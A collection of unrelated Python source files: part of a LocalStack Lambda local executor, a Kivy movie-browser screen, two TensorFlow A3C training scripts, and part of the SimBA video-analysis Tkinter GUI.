self.set_default_env_variables()
# run the actual handler function
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
func_arn,
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s'
% (func_arn, error, "".join(traceback.format_tb(error.__traceback__)))
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(self, event, context, main_file, func_details=None):
func_details.envvars = func_details.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = func_details.handler
func_details.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
func_details, event, environment=func_details.envvars, lambda_command=cmd
)
self.apply_plugin_patches(inv_context)
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, func_details=func_details)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def execute_javascript_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, func_details=None):
event_json_string = "%s" % (json.dumps(event) if event else "{}")
cmd = "AWS_LAMBDA_FUNCTION_HANDLER=%s AWS_LAMBDA_EVENT_BODY='%s' %s" % (
main_file,
event_json_string,
GO_LAMBDA_RUNTIME,
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ""
if func_details.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
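    # Example (illustrative): for archive="/tmp/app/handler.jar" with no other JARs next to it,
    # get_java_classpath() returns ".:handler.jar:*.jar:java/lib/*.jar", i.e. all entries are
    # relative to the directory containing the archive.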
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
if not env_vars.get("AWS_ENDPOINT_URL"):
# Note that $AWS_ENDPOINT_URL is currently not (yet) supported by AWS, but we
# can use it to ship patched Lambda runtimes that can interpret this config.
env_vars["AWS_ENDPOINT_URL"] = config.get_edge_url(
localstack_hostname=main_endpoint, protocol="http"
)
return env_vars
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
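# A minimal selection sketch (assuming LAMBDA_EXECUTOR holds one of the keys above; the exact
# lookup performed elsewhere in the codebase may differ):
#
#   executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)
#   executor.startup()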
|
moviescreen.py
|
import cfg
from kivy.uix.screenmanager import Screen
from kivy.lang import Builder
from kivy.properties import *
import ytvApi as ytv
from threading import Thread
Builder.load_string('''
<MovieScreen>:
name:'moviescreen'
MDBoxLayout:
orientation:'vertical'
spacing:dp(10)
MDBoxLayout:
size_hint:1,None
MDIconButton:
icon:"arrow-left-bold"
on_release:root.close_screen()
MDLabel:
size_hint:1,None
halign:'center'
markup:True
font_name:'fonts/title'
text:'[b][u]'+root.title
MDIconButton:
id:add_bk
icon:
on_release:root.bookmark()
MDBoxLayout:
size_hint_y:.4
canvas.before:
Color:
rgba:app.theme_cls.primary_dark[:-1]+[.2]
RoundedRectangle:
size:self.size
pos: self.pos
LoadImg:
id:loadimg
Image:
id:thumb
allow_stretch:True
keep_ratio: True
source:
nocache:True
ScrollView:
id:info_scroll_view
#bar_pos_y:'left'
bar_width:dp(5)
bar_inactive_color:.7,.7,.7,.4
padding:dp(10)
MDLabel:
canvas.before:
Color:
rgba:0,0,0,.2
RoundedRectangle:
size:self.size
pos: self.pos
id:info
text:root.info
font_name:'fonts/movie_info'
font_style: 'Subtitle1'
valign:'top'
size_hint_y:None
height:self.texture_size[1]
ScreenManager:
id:sm
SeasonScreen:
id:ss
FormatScreen:
id:fs
''')
class MovieScreen(Screen):
movie=ObjectProperty()
title=StringProperty('Loading...')
info=StringProperty('Loading...')
def on_enter(self,*a):
if self.movie.info and not cfg.doCaptcha:
bk=ytv.BookMarks()
self.ids.add_bk.icon='star' if bk.is_bk(self.movie.name) else 'star-outline'
self.ids.thumb.texture=self.movie.img_texture
self.title=t=self.movie.name
cfg.history_entry.append(t)
self.info=self.movie.info
#self.ids.sm.clear_widgets()
Thread(target=self.get_seasons,daemon=True).start()
elif cfg.doCaptcha==True:
cfg.doCaptcha=False
def bookmark(self,*a):
bk=ytv.BookMarks()
from kivymd.toast import toast
if self.ids.add_bk.icon=='star':
self.ids.add_bk.icon='star-outline'
bk.del_bk(self.movie.name)
cfg.BOOKTAB.sync()
            toast('Bookmark removed')
else :
self.ids.add_bk.icon='star'
self.movie.bookmark()
cfg.b_seasons[self.movie.name]=self.movie
cfg.BOOKTAB.sync()
            toast('Bookmark added')
def get_seasons(self,*a):
s=self.movie.get_seasons()
self.ids.sm.get_screen('season_screen').seasons=s
self.ids.sm.current='season_screen'
def close_screen(self,*a):
self.ids.sm.current='season_screen'
#self.ids.sm.get_screen('season_screen').kill()
self.manager.current='tmscreen'
def on_pre_leave(self,*a):
self.ids.info_scroll_view.scroll_y=1
def on_leave(self,*a):
cfg.BOOKTAB.bug=True
cfg.BOOKTAB.sync()
if not cfg.doCaptcha:
self.ids.ss.kill()
self.ids.thumb.texture=None
self.title='Loading'
self.info='Loading'
cfg.history_entry=[]
#self.ids.info_scroll_view.scroll_y=1
|
train_A3C.py
|
import argparse
import itertools
import os
import threading
import time
import tensorflow as tf
from atari_env import A_DIM
from atari_env import S_DIM
from atari_env import make_env
from evaluate import Evaluate
from net import Net
from utils import print_params_nums
from worker import Worker
def main(args):
if args.save_path is not None and not os.path.exists(args.save_path):
os.makedirs(args.save_path)
summary_writer = tf.summary.FileWriter(os.path.join(args.save_path, 'log'))
global_steps_counter = itertools.count() # thread-safe
global_net = Net(S_DIM, A_DIM, 'global', args)
num_workers = args.threads
workers = []
# create workers
for i in range(1, num_workers + 1):
        worker_summary_writer = summary_writer if i == 1 else None  # only the first worker writes summaries (workers are numbered from 1)
worker = Worker(i, make_env(args), global_steps_counter,
worker_summary_writer, args)
workers.append(worker)
saver = tf.train.Saver(max_to_keep=5)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if args.model_path is not None:
print('Loading model...\n')
ckpt = tf.train.get_checkpoint_state(args.model_path)
saver.restore(sess, ckpt.model_checkpoint_path)
else:
print('Initializing a new model...\n')
sess.run(tf.global_variables_initializer())
print_params_nums()
# Start work process for each worker in a separated thread
worker_threads = []
for worker in workers:
            t = threading.Thread(target=worker.run, args=(sess, coord, saver))  # bind this worker's run method directly so each thread runs its own worker
t.start()
time.sleep(0.5)
worker_threads.append(t)
if args.eval_every > 0:
evaluator = Evaluate(
global_net, summary_writer, global_steps_counter, args)
evaluate_thread = threading.Thread(
target=lambda: evaluator.run(sess, coord))
evaluate_thread.start()
coord.join(worker_threads)
def args_parse():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model_path', default=None, type=str,
help='Whether to use a saved model. (*None|model path)')
parser.add_argument(
'--save_path', default='/tmp/a3c', type=str,
help='Path to save a model during training.')
parser.add_argument(
'--max_steps', default=int(1e8), type=int, help='Max training steps')
parser.add_argument(
'--start_time', default=None, type=str, help='Time to start training')
parser.add_argument(
'--threads', default=16, type=int,
        help='Number of parallel worker threads (default: 16)')
# evaluate
parser.add_argument(
'--eval_every', default=500, type=int,
help='Evaluate the global policy every N seconds')
parser.add_argument(
        '--record_video', default=True, type=bool,  # note: argparse's type=bool treats any non-empty string as True
help='Whether to save videos when evaluating')
parser.add_argument(
'--eval_episodes', default=5, type=int,
        help='Number of episodes per evaluation')
# hyperparameters
parser.add_argument(
'--init_learning_rate', default=7e-4, type=float,
help='Learning rate of the optimizer')
parser.add_argument(
'--decay', default=0.99, type=float,
help='decay factor of the RMSProp optimizer')
parser.add_argument(
'--smooth', default=1e-7, type=float,
help='epsilon of the RMSProp optimizer')
parser.add_argument(
'--gamma', default=0.99, type=float,
        help='Discount factor for rewards and advantages')
parser.add_argument('--tmax', default=5, type=int, help='Rollout size')
parser.add_argument(
'--entropy_ratio', default=0.01, type=float,
help='Initial weight of entropy loss')
parser.add_argument(
'--clip_grads', default=40, type=float,
help='global norm gradients clipping')
parser.add_argument(
'--epsilon', default=1e-5, type=float,
help='epsilon of rmsprop optimizer')
return parser.parse_args()
if __name__ == '__main__':
# ignore warnings by tensorflow
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# make GPU invisible
os.environ['CUDA_VISIBLE_DEVICES'] = ''
args = args_parse()
main(args)
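    # Example invocation (flags defined in args_parse above; paths and values are illustrative):
    #   python train_A3C.py --threads 8 --save_path /tmp/a3c --eval_every 600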
|
Main.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from multiprocessing import Process
from init import Settings
def utilityThread(settings, sess, saver, globalEpisodes, coord):
import time
lastSave = sess.run(globalEpisodes)
while not coord.should_stop():
episodeNumber = sess.run(globalEpisodes)
print("|| __ {} __ || Global episodes: {} ||".format(settings.activity, sess.run(globalEpisodes)))
if (episodeNumber > 5000 + lastSave and settings.saveCheckpoint):
print("UtilityThread is saving the model!")
saver.save(sess, settings.tfGraphPath, episodeNumber)
lastSave = episodeNumber
if (episodeNumber > settings.trainingEpisodes):
print("Training done is done!!!!")
coord.request_stop()
time.sleep(2) # This function needs little CPU time
if (settings.saveCheckpoint):
print("Program is terminating, saving the model!")
saver.save(sess, settings.tfGraphPath, sess.run(globalEpisodes))
def run(settings = Settings()):
import tensorflow as tf
import os
from ACNetwork import ACNetwork
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
config = tf.ConfigProto()
#config.gpu_options.allow_growth = True
#config.gpu_options.per_process_gpu_memory_fraction = 1.0
    with tf.Session(config=config) as sess:
globalEpisodes = tf.Variable(0, dtype=tf.int32, name='global_episodes', trainable=False)
globalNetwork = ACNetwork(settings, "global")
coord = tf.train.Coordinator()
trainers, workers, games = setupConcurrency(settings, sess, coord, globalEpisodes)
saver = tf.train.Saver(max_to_keep=1, keep_checkpoint_every_n_hours=2)
if settings.loadCheckpoint:
saver.restore(sess, settings.tfCheckpoint)
else:
sess.run(tf.global_variables_initializer())
for thread in trainers:
thread.start()
for thread in workers:
thread.start()
for process in games:
process.start()
utilityThread(settings, sess, saver, globalEpisodes, coord)
for game in games:
game.terminate()
def setupConcurrency(settings, sess, coord, globalEpisodes):
from queue import Queue
from multiprocessing import Queue as PQueue
import Concurrency
from Worker import Worker
from Trainer import Trainer
trainingQueues = []
trainerThreads = []
for i in range(settings.trainerThreads):
queue = Queue(100)
trainingQueues.append(queue)
trainerThreads.append(Concurrency.TrainerRunner(coord, queue))
gameDataQueues = []
workerThreads = []
for i in range(settings.workerThreads):
gameDataQueue = PQueue(100)
gameDataQueues.append(gameDataQueue)
workerThreads.append(Concurrency.WorkerRunner(coord, gameDataQueue))
gameProcesses = []
for i in range(settings.gameProcesses):
gameProcesses.append(Concurrency.GameRunner(settings))
trainers = []
for i in range(settings.trainers):
trainer = Trainer(settings, sess, i, coord, globalEpisodes)
trainers.append(trainer)
trainerThreads[i % len(trainerThreads)].addTrainer(trainer)
for i in range(settings.workers):
playerActionQueue = PQueue(100)
queues = {"trainer": trainingQueues[i%len(trainingQueues)],
"gameData": gameDataQueue,
"playerAction": playerActionQueue}
trainer = trainers[i%len(trainers)]
worker = Worker(settings, sess, i, trainer.number, trainer.localAC, queues, coord)
workerThreads[i % len(workerThreads)].addWorker(worker)
gameProcesses[i % len(gameProcesses)].addGame(gameDataQueues[i % len(gameDataQueues)], playerActionQueue)
return trainerThreads, workerThreads, gameProcesses
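# Concurrency layout built by setupConcurrency() above: trainers and workers live in threads of
# this process and receive work through queue.Queue instances (the "trainer" queues), while the
# game processes exchange data with workers through multiprocessing.Queue instances (the
# "gameData" and "playerAction" queues), since those have to cross process boundaries.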
def startProcess(settings):
settings.generateActivity()
settings.generatePaths()
process = Process(target=run, args=(settings,))
process.start()
return process
def main():
conf = Settings()
trainingSession = startProcess(conf)
trainingSession.join()
if __name__ == "__main__":
main()
|
SimBA.py
|
import warnings
warnings.filterwarnings('ignore',category=FutureWarning)
warnings.filterwarnings('ignore',category=DeprecationWarning)
import os
import time
import subprocess
import itertools
#import deeplabcut
import csv
import sys
from tkinter import *
from tkinter.filedialog import askopenfilename,askdirectory
from tkinter import tix, messagebox
import platform
import shutil
from tabulate import tabulate
from configparser import ConfigParser, NoSectionError, NoOptionError, MissingSectionHeaderError
from PIL import Image, ImageTk
import tkinter.ttk as ttk
import webbrowser
import cv2
from simba.plotly_create_h5 import *
from simba.dlc_change_yamlfile import *
from simba.tkinter_functions import *
from simba.create_project_ini import write_inifile
from simba.json2csv import json2csv_file, json2csv_folder
from simba.run_RF_model import rfmodel
from simba.prob_graph import *
from simba.runmodel_1st import *
from simba.path_plot import path_plot_config
from simba.gantt import ganntplot_config
from simba.data_plot import data_plot_config
from simba.line_plot import line_plot_config
from simba.import_videos_csv_project_ini import *
from simba.labelling_aggression import *
from simba.pseudoLabel import semisuperviseLabel
from simba.load_labelling_aggression import load_folder
from simba.get_coordinates_tools_v2 import get_coordinates_nilsson
from simba.process_data_log import analyze_process_data_log
from simba.process_severity import analyze_process_severity
from simba.extract_seqframes import *
from simba.classifierValidation import validate_classifier
from simba.train_multiple_models_from_meta import *
from simba.train_model_2 import *
from simba.multiplecrop import *
from simba.extract_frames_fast import *
from simba.rw_dfs import *
from simba.validate_model_on_single_video import *
from simba.ROI_freehand_draw_3 import roiFreehand
from simba.ROI_analysis_2 import *
from simba.ROI_plot import *
from simba.ROI_draw_defined import *
from simba.ROI_multiply import *
from simba.ROI_reset import *
from simba.ROI_add_to_features import *
from simba.ROI_process_movement import *
from simba.ROI_visualize_features import ROItoFeaturesViz
from simba.plot_heatmap import plotHeatMap
from simba.append_boris import *
from simba.outlier_scripts.movement.correct_devs_mov_16bp import dev_move_16
from simba.outlier_scripts.location.correct_devs_loc_16bp import dev_loc_16
from simba.outlier_scripts.movement.correct_devs_mov_user_defined import dev_move_user_defined
from simba.outlier_scripts.location.correct_devs_loc_user_defined import dev_loc_user_defined
from simba.outlier_scripts.movement.correct_devs_mov_14bp import dev_move_14
from simba.outlier_scripts.location.correct_devs_loc_14bp import dev_loc_14
from simba.outlier_scripts.skip_outlierCorrection import skip_outlier_c
from simba.features_scripts.extract_features_16bp import extract_features_wotarget_16
from simba.features_scripts.extract_features_14bp import extract_features_wotarget_14
from simba.features_scripts.extract_features_14bp_from_16bp import extract_features_wotarget_14_from_16
from simba.features_scripts.extract_features_9bp import extract_features_wotarget_9
from simba.features_scripts.extract_features_8bp import extract_features_wotarget_8
from simba.features_scripts.extract_features_7bp import extract_features_wotarget_7
from simba.features_scripts.extract_features_4bp import extract_features_wotarget_4
from simba.features_scripts.extract_features_user_defined import extract_features_wotarget_user_defined
from simba.sklearn_plot_scripts.plot_sklearn_results_2 import plotsklearnresult
from simba.sklearn_plot_scripts.plot_sklearn_results_2_single import plotsklearnresultsingle
from simba.drop_bp_cords import define_bp_drop_down,reverse_dlc_input_files
from simba.drop_bp_cords import bodypartConfSchematic
from simba.define_new_pose_config import define_new_pose_configuration
# from simba.dpk_create_project_ini import write_dpkfile
# from simba.dpk_script.create_annotation_set import createAnnotationSet
# from simba.dpk_script.annotator import dpkAnnotator
# from simba.dpk_script.train_model import trainDPKmodel
# from simba.dpk_script.Predict_new_video import predictnewvideoDPK
# from simba.dpk_script.Visualize_video import visualizeDPK
from simba.reset_poseConfig import reset_DiagramSettings
from simba.plot_threshold import plot_threshold
from simba.merge_frames_movie import mergeframesPlot
from simba.plot_heatmap_location_new import plotHeatMapLocation
from simba.appendMars import append_dot_ANNOTT
from simba.read_DLCmulti_h5_function import importMultiDLCpose
from simba.sleap_bottom_up_convert import importSLEAPbottomUP
from simba.timeBins_movement import time_bins_movement
from simba.timeBins_classifiers import time_bins_classifier
from simba.ez_lineplot import draw_line_plot,draw_line_plot_tools
from simba.append_boris import append_Boris_annot
from simba.ROI_directionality_to_other_animals import *
from simba.ROI_directionality_to_other_animals_visualize import *
from simba.import_solomon import solomonToSimba
from simba.reverse_tracking_order import reverse_tracking_2_animals
from simba.Kleinberg_burst_analysis import run_kleinberg
from simba.FSTCC import FSTCC_perform
from simba.pup_retrieval_1 import pup_retrieval_1
import urllib.request
from cefpython3 import cefpython as cef
import threading
import datetime
import atexit
simBA_version = 1.2
currentPlatform = platform.system()
if currentPlatform == 'Linux' or currentPlatform == 'Darwin':
from simba.process_videos_automation_linux import *
if currentPlatform == 'Windows':
from simba.process_videos_automation_win import *
class roitableRow(Frame):
def __init__(self, parent =None ,dirname='',filename = '',widths = "" ,indexs='',projectini=''):
self.projectini = projectini
self.filename = os.path.join(dirname,filename)
Frame.__init__(self,master=parent)
var=StringVar()
self.index = Entry(self,textvariable=var,width=4)
var.set(indexs)
self.index.grid(row=0,column=0)
self.lblName = Label(self,text=filename,width =widths,anchor=W)
self.lblName.grid(row=0,column=1,sticky=W)
self.btnset = Button(self,text='Draw',command=self.draw)
self.btnset.grid(row=0,column=2)
self.btnreset = Button(self,text='Reset',command =self.reset)
self.btnreset.grid(row=0,column=3)
self.btnapplyall = Button(self, text='Apply to all', command=self.applyall)
self.btnapplyall.grid(row=0, column=4)
def draw(self):
roiFreehand(self.projectini,self.filename)
def reset(self):
ROI_reset(self.projectini, self.filename)
def applyall(self):
multiplyFreeHand(self.projectini, self.filename)
class roitableMenu:
def __init__(self,videofolder,inifile):
self.filesFound = []
self.row = []
self.videofolder = videofolder
### FIND FILES #####
for i in os.listdir(videofolder):
            if i.endswith(('.avi', '.mp4', '.mov', '.flv')):
self.filesFound.append(i)
### longest string in list
maxname = max(self.filesFound, key=len)
## popup window
roimenu = Toplevel()
roimenu.minsize(500, 400)
roimenu.wm_title("ROI Table")
scroll = hxtScrollbar(roimenu)
tableframe = LabelFrame(scroll,text='Video Name',labelanchor=NW)
#### loop for tables######
for i in range(len(self.filesFound)):
self.row.append(roitableRow(tableframe, self.videofolder,str(self.filesFound[i]), str(len(maxname)),str(i+1)+'.',projectini=inifile))
self.row[i].grid(row=i + 1, sticky=W)
tableframe.grid(row=0)
class processvid_title(Frame):
def __init__(self,parent=None,widths="",color=None,shortenbox =None,downsambox =None,graybox=None,framebox=None,clahebox=None,**kw):
self.color = color if color is not None else 'black'
Frame.__init__(self,master=parent,**kw)
self.lblName = Label(self, text= 'Video Name',fg=str(self.color),width=int(widths)+5,font=("Helvetica",10,'bold'))
self.lblName.grid(row=0,column=0,sticky=W)
self.lblName3 = Label(self, text='Start Time',width = 13,font=("Helvetica",10,'bold'))
self.lblName3.grid(row=0, column=1,columnspan=2)
self.lblName4 = Label(self, text='End Time',width = 15,font=("Helvetica",10,'bold'))
self.lblName4.grid(row=0, column=3)
self.shorten = IntVar()
self.lblName5 = Checkbutton(self,text='Select All',variable= self.shorten,command=shortenbox)
self.lblName5.grid(row=0, column=4)
self.lblName6 = Label(self, text='Width',width =13,font=("Helvetica",10,'bold'))
self.lblName6.grid(row=0, column=5)
self.lblName7 = Label(self, text='Height',width = 15,font=("Helvetica",10,'bold'))
self.lblName7.grid(row=0, column=6)
self.downsample = IntVar()
self.lblName8 = Checkbutton(self,text='Select All',variable = self.downsample,command =downsambox)
self.lblName8.grid(row=0,column=7,padx=8)
self.grayscale = IntVar()
self.lblName9 = Checkbutton(self,text='Select All',variable =self.grayscale,command = graybox)
self.lblName9.grid(row=0,column=8,padx=7)
self.frameno = IntVar()
self.lblName10 = Checkbutton(self,text='Select All',variable = self.frameno,command = framebox)
self.lblName10.grid(row=0,column=9,padx=6)
self.clahe = IntVar()
self.lblName11 = Checkbutton(self,text='Select All',variable =self.clahe,command =clahebox)
self.lblName11.grid(row=0,column=10,padx=6)
class processvideotable(Frame):
def __init__(self,parent=None,fileDescription="",widths = "" ,dirname ="",outputdir='',color=None,**kw):
self.color = color if color is not None else 'black'
self.croplist = []
self.filename = os.path.join(dirname,fileDescription)
self.outputdir = outputdir
Frame.__init__(self,master=parent,**kw)
self.lblName = Label(self, text=fileDescription,fg=str(self.color),width= widths,anchor=W)
self.lblName.grid(row=0,column=0,sticky=W)
self.btnFind = Button(self, text="Crop",command=self.cropvid)
self.btnFind.grid(row=0,column=1)
self.trimstart = Entry(self)
self.trimstart.grid(row=0,column=2)
self.trimend = Entry(self)
self.trimend.grid(row=0, column=3)
self.shortenvar = IntVar()
self.downsamplevar = IntVar()
self.grayscalevar = IntVar()
self.superimposevar = IntVar()
self.clahevar = IntVar()
self.shortenvid = Checkbutton(self,text='Shorten',variable = self.shortenvar)
self.shortenvid.grid(row=0,column=4)
self.width = Entry(self)
self.width.grid(row=0,column=5)
self.height = Entry(self)
self.height.grid(row=0,column=6)
self.downsamplevid = Checkbutton(self,text='Downsample',variable = self.downsamplevar)
self.downsamplevid.grid(row=0,column=7)
self.grayscalevid = Checkbutton(self,text='Grayscale',variable= self.grayscalevar)
self.grayscalevid.grid(row=0,column =8)
self.superimposevid = Checkbutton(self,text='Add Frame #',variable =self.superimposevar)
self.superimposevid.grid(row=0,column=9)
self.clahevid = Checkbutton(self,text='CLAHE',variable = self.clahevar)
self.clahevid.grid(row=0,column =10)
def cropvid(self):
self.croplist = []
print(self.filename)
command = cropvid_queue(self.filename,self.outputdir)
self.croplist.append(command)
self.btnFind.configure(bg='red')
def get_crop_list(self):
return self.croplist
def getstarttime(self):
return self.trimstart.get()
def getendtime(self):
return self.trimend.get()
def shorten(self):
return self.shortenvar.get()
def downsample(self):
return self.downsamplevar.get()
def getwidth(self):
return self.width.get()
def getheight(self):
return self.height.get()
def grayscale(self):
return self.grayscalevar.get()
def addframe(self):
return self.superimposevar.get()
def get_clahe(self):
return self.clahevar.get()
class processvid_menu:
def __init__(self, videofolder, outputdir):
self.filesFound = []
self.row = []
self.videofolder = videofolder
self.outputdir = outputdir
########### FIND FILES ###########
for i in os.listdir(videofolder):
            if i.endswith(('.avi', '.mp4', '.mov', '.flv', '.m4v')):
self.filesFound.append(i)
### longest string in list
maxname = max(self.filesFound,key=len)
# Popup window
vidprocessmenu = Toplevel()
vidprocessmenu.minsize(1100, 400)
vidprocessmenu.wm_title("Batch process video table")
vidprocessmenu.lift()
scroll = Canvas(hxtScrollbar(vidprocessmenu))
scroll.pack(fill="both",expand=True)
#shortcut for filling up parameters
shortcutframe = LabelFrame(scroll,text='Quick settings',pady=5,padx=5)
#shorten
shortenshortcut = LabelFrame(shortcutframe,text='Shorten settings',padx=5)
starttime = Entry_Box(shortenshortcut,'Start time','15')
endtime = Entry_Box(shortenshortcut,'End time','15')
shortenbutton = Button(shortenshortcut,text='Save settings',command=lambda:self.saveShortensettings(starttime.entry_get,endtime.entry_get))
#add sec
secondshortcut = LabelFrame(shortcutframe,text='Add seconds to start time',padx=5)
secondstoadd = Entry_Box(secondshortcut,'seconds','15')
addsecbutton = Button(secondshortcut,text='Add seconds',command=lambda:self.addsec(secondstoadd.entry_get))
#downsample
downsampleshortcut = LabelFrame(shortcutframe,text='Downsample settings',padx=5)
width = Entry_Box(downsampleshortcut,'Width','15')
height = Entry_Box(downsampleshortcut,'Height','15')
downsamplebutton = Button(downsampleshortcut,text='Save settings',command=lambda:self.saveDownsamplesettings(width.entry_get,height.entry_get))
#organize
shortenshortcut.grid(row=0,sticky=W,padx=10)
starttime.grid(row=0,sticky=W)
endtime.grid(row=1,sticky=W)
shortenbutton.grid(row=2,sticky=W)
secondshortcut.grid(row=1,sticky=W,padx=10)
secondstoadd.grid(row=0,sticky=W)
addsecbutton.grid(row=1,sticky=W)
downsampleshortcut.grid(row=0,column=1,sticky=W)
width.grid(row=0,sticky=W)
height.grid(row=1,sticky=W)
downsamplebutton.grid(row=2,sticky=W)
## starting of the real table
tableframe = LabelFrame(scroll)
# table title
self.title = processvid_title(tableframe, str(len(maxname)), shortenbox=self.selectall_shorten,
downsambox=self.selectall_downsample, graybox=self.selectall_grayscale,
framebox=self.selectall_addframe, clahebox=self.selectall_clahe)
#### loop for tables######
for i in range(len(self.filesFound)):
self.row.append(processvideotable(tableframe,str(self.filesFound[i]), str(len(maxname)),self.videofolder,self.outputdir))
self.row[i].grid(row=i+1, sticky=W)
#organize table title
self.title.grid(row=0, sticky=W)
#button to trigger process video
but = Button(scroll,text='Execute',command = lambda: threading.Thread(target=self.execute_processvideo).start(),font=('Times',12,'bold'),fg='navy')
but.grid(row=2)
#organize
shortcutframe.grid(row=0,sticky=W)
tableframe.grid(row=1,sticky=W,)
